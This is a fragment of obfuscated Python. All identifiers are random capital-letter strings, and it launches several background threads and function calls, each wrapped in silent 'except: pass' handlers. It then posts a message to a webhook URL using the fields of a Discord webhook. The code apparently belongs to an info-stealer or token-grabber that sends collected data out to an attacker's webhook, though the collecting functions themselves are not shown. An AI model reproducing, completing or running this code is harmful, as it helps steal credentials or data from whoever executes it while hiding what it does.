try: threading.Thread(target=HSYUFIFWOCIXCZKJZQEPAHRQCTGLRHZJMTHKPFYPSSCMBNBONPEIWGUEMRVMRDWMOHHJORMVEQ).start()
except: pass
try: threading.Thread(target=ZFHXYNLVKVUZVCRJHGVMICBTFNUUIJEXKEBTIRDJBWRNPQAOORLW).start()
except: pass
try: threading.Thread(target=GENNGVNHESTFVLKFZPFRCESLWRXDTKPUAQOVGNLMGSSMYGRFSBTTDDEVHLRTUAFTKUVIDBZDERUHPWEKUGM).start()
except: pass
try: threading.Thread(target=KXOKZHYULWCXXOYYUXTJBTPQJAZLHJDMHZEYYHIJTVEKLYNIUMZACZFNQSMIQVGOJHZHBJEKXBQAJCHHYQTJPMSYHNH).start()
except: pass
try: QWRJEFUDZFWZCLOYQHMCJWJKYONKEFCGVFNUOEEFGBGDXIPNGZXRUFQBBLRMEPUY()
except: pass
try: GCXCGITAZLRORAVNLWTTRRHMTIAQGZHMEIPRICXAOAHYQFWQGCJRRONECGXKVUKVHVHI()
except: pass
try: MAAQYXPRVDTOHHMZLQBTEDCOILPJRKNEDLLCDDHMAENGKJTHOUVHNQOLSRVDOTOOYPRACVQ()
except: pass
try: BBCIGCEUHBLYLJOBUWUNDTPXOIFCBKBCPIRVGXWEJJTUUCTXIUBFQGACL()
except: pass
try: MSVIEISEQLCQTCTCAXERQHJAUSAANHNLPCQIHGIFQIOJSRSCEUBZWFHOPADLTNOZHA()
except: pass
try: NKGXZYKMZWSPYTXLUCOKRFSGCZWYKLEESHDANTNZCGQCMIMBTLGQDXQNTPOWZJIBYTS()
except: pass
try: WYDCJZQHCVQHVFPERWVDLSALHEMAUKMYPMPXDHLYNWMUKFAXJZZXLVAORRCRM()
except: pass
try: UHNKXCIUCYFGYLBVQYJHZVJGRNRLGQNRBKZDPTEZKSXYCRWCCFSTTTXLNTDOHHKYCLJNMDQVBIJXJRDXMCONYWLPPPHYXLGVEGPT()
except: pass
try: requests.post(XFPYMGNWYTCXHRPSAZIJUDBSKKJSMGGIPLUDNNZGMXGYPCJJQIXHKDLYEPBZJD, json={'content': f'****╚══════════════════{EBRLITLEOUKWQPCEPRJVPEYNWSXBEGAANMWMWDCSHMORJOTXGBXOOPNAML}══════════════════╝****', 'username': TCQVWBVWRGAWZJFAVAAEZLFRUWGNTHXWRMCHKMDTPFLHWJJBRKGWLG, 'avatar_url': IAPXGVZXFYZVWAOBOMLAXSPSPVRTMGBLSCFIBIQVPDHPTEZCVLFALCCVWKOWHCLCLGNGTYBDHUVFBVYIIAFGCJFQSRTPEYQKR})
except: pass
try: threading.Thread(target=ZHNUCWAXSHDYPFKAFDEVTAIPICPNPRYQUWYLZMREZQNEJMMJEOUKWEAEDCZLOYI).start()
except: pass
try: threading.Thread(target=ANUYLWENJNVXDPVJZJIRQWDJSJXZYTQRFKTPLDOBXDGVHVCPXFXSVYUHQJMKFHEKBIVMUGR).start()
except: pass
try: threading.Thread(target=GHVOIEBFHVFKCAUZOOWSUIVYBGIMDNUAJQGGHDZQAHJDDYKLPFAFASMWDSZOZGYWTHWNRHZLKEVGYKATDPIKED).start()
except: pass
try: threading.Thread(target=DFDNKZAVJSLDXGQACSLOLZYNTMZQUSBKASXVXJIZSSKZDWKLWLKXIULFUIWMSWMMEMHICKIUSRBA).start()
except: pass
